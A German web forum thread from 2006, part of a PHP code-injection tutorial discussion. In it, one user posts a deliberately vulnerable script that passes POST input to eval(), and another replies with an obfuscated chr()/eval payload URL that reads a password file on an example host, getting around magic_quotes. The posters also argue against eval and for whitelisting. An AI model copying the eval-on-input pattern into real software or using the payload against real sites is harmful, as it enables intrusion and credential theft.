Flashforum - Die Community zu Adobe Flash, Flex AIR. Web Design und Inspiration.

the binary · 18-03-2006, 18:24

elias, schick mal pm..

Edit:
btw: hut ab, daumen hoch und danke, für das schliessen einiger wissenslücken...

Frohni · 18-03-2006, 19:28

Zitat:

Zitat von rechtschreibfan

doch.

Aha...
dann injizier doch mal hier Code:

PHP-Code:

  <?

$test=$_POST[test];

$test=urlencode($test);

echo $test;

eval($test);

?>

<form name='form1' method='POST'>

<input type='text' name='test'>

<input type='submit' value='senden'>

</form>

Gruß, Frank

elias · 19-03-2006, 13:02

Frohni, das mag vielleicht funktionieren. Aber wenn du eine größere Anwendung
schreibst dann wirst du kaum im Auge behalten können welche Daten in eine
unsichere Funktion gelangen und wie bzw. womit die hin und her kodiert wurden.
Selbst wenn 'du' es schaffst, was ist mit anderen Mitarbeitern?
Eval ist in den Meisten fällen einfach völlig unnötig und include in diesem Fall auch.

Frohni · 19-03-2006, 13:15

Elias, das leuchtet mir absolut ein. Solche Sachen sollten immer mit einer Whitelist verifiziert werden (wie Du schon selber geschrieben hast). Es ging mir halt nur um das "was wäre wenn".
Im Nachhinein geht das urlencode im counterscript auch nicht, da die zugrundeliegende Datei "included" wird und somit ausführbar sein muß/soll.

eval: gerade bei meinem aktuellem Projekt komme ich nicht um eval herum. Solange die Aufrufe jedoch nicht auf GET/POST Variablen beruhen, sondern im Code festgelegt sind, sehe ich da kein Problem.

Gruß, Frank

elias · 21-03-2006, 21:08

Nochmal zurück zum Thema. Es gab bei der Code Injection ein kleines Problem
was verhindert hat das ich " oder ' injizieren konnte. Leider konnte ich das
Verhalten nicht mehr reproduzieren, ich vermute es liegt an PHP 4 oder
magic_quotes.
Jedefalls ist man ohne Quotes schon ziemlich aufgeschmissen wenn z.B. Pfade
(also Strings) zu Dateien injizieren möchte. Deswegen habe ich den kompletten
Code kodiert und in ein eval gesteckt:

PHP-Code:

 
$s = str_split("readfile('/full/path/to/passwords');");

$s = array_map('ord', $s);

$s = 'eval(chr('.implode(').chr(', $s).'));';

echo "http://example.com/counter.php?daten=".urlencode('<?php '.$s.' ?>');

Das ist keine große Kunst aber zwei Dinge möchte ich dazu sagen.

1. Gibt es sehr viel trickreichere Wege Code über 10 Ecken einzuschleusen, z.B. tricks mit Multibyte Charsets führen immer zu netten "Aha" effekten.
Ich will damit sagen das eine Lösung auf dem ersten Blick nicht umbedingt eine sein muss.

2. Ohne eval hätte der Angriff nicht funktioniert.

x!sign.dll · 22-03-2006, 14:08

lol...
DAS is mal echt derbe - vorallem die Nutzlosigkeit von magic_quotes in dem Fall.

18-03-2006, 18:24	#16 (permalink)
the binary Neuer User Registriert seit: Jul 2001 Ort: Berlin \| Friedrichshain Beiträge: 3.561	elias, schick mal pm.. Edit: btw: hut ab, daumen hoch und danke, für das schliessen einiger wissenslücken... __________________ 8bm \| join ff@BOINC formpackage.org \| audiohunter.de \| problematica.de \| 8ball-media.de/blog \| taikonauten.cn Geändert von the binary (18-03-2006 um 18:26 Uhr)

19-03-2006, 13:02	#18 (permalink)
elias flachzange Registriert seit: Jun 2003 Ort: berlin Beiträge: 3.932	Frohni, das mag vielleicht funktionieren. Aber wenn du eine größere Anwendung schreibst dann wirst du kaum im Auge behalten können welche Daten in eine unsichere Funktion gelangen und wie bzw. womit die hin und her kodiert wurden. Selbst wenn 'du' es schaffst, was ist mit anderen Mitarbeitern? Eval ist in den Meisten fällen einfach völlig unnötig und include in diesem Fall auch. __________________ <CORNHOLIO/>

21-03-2006, 21:08	#20 (permalink)
elias flachzange Registriert seit: Jun 2003 Ort: berlin Beiträge: 3.932	Nochmal zurück zum Thema. Es gab bei der Code Injection ein kleines Problem was verhindert hat das ich " oder ' injizieren konnte. Leider konnte ich das Verhalten nicht mehr reproduzieren, ich vermute es liegt an PHP 4 oder magic_quotes. Jedefalls ist man ohne Quotes schon ziemlich aufgeschmissen wenn z.B. Pfade (also Strings) zu Dateien injizieren möchte. Deswegen habe ich den kompletten Code kodiert und in ein eval gesteckt: PHP-Code: `$s = str_split("readfile('/full/path/to/passwords');"); $s = array_map('ord', $s); $s = 'eval(chr('.implode(').chr(', $s).'));'; echo "http://example.com/counter.php?daten=".urlencode('<?php '.$s.' ?>');` Das ist keine große Kunst aber zwei Dinge möchte ich dazu sagen. 1. Gibt es sehr viel trickreichere Wege Code über 10 Ecken einzuschleusen, z.B. tricks mit Multibyte Charsets führen immer zu netten "Aha" effekten. Ich will damit sagen das eine Lösung auf dem ersten Blick nicht umbedingt eine sein muss. 2. Ohne eval hätte der Angriff nicht funktioniert. __________________ <CORNHOLIO/>

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

LinkBacks (?) LinkBack zu diesem Thema: http://www.flashforum.de/forum/php-und-mysql/tutorial-php-code-injection-197417.html
Erstellt von	Für	Art	Datum	Hits
Code Injection Hack , Anfänger sollten lieber nicht Programmieren...	Dieses Thema	Refback	24-06-2011 16:20	6
Web und Netzwerk PHP - Code Injection Angriffe Schweinfurt den ...	Dieses Thema	Refback	24-08-2009 14:30	51

19-03-2006, 13:15	#19 (permalink)
Frohni Neuer N00b Registriert seit: Jun 2004 Ort: Norddeutschland SH Beiträge: 427	Elias, das leuchtet mir absolut ein. Solche Sachen sollten immer mit einer Whitelist verifiziert werden (wie Du schon selber geschrieben hast). Es ging mir halt nur um das "was wäre wenn". Im Nachhinein geht das urlencode im counterscript auch nicht, da die zugrundeliegende Datei "included" wird und somit ausführbar sein muß/soll. eval: gerade bei meinem aktuellem Projekt komme ich nicht um eval herum. Solange die Aufrufe jedoch nicht auf GET/POST Variablen beruhen, sondern im Code festgelegt sind, sehe ich da kein Problem. Gruß, Frank

22-03-2006, 14:08	#21 (permalink)
x!sign.dll Kaffee... Registriert seit: May 2004 Ort: de/en Beiträge: 433	lol... DAS is mal echt derbe - vorallem die Nutzlosigkeit von magic_quotes in dem Fall.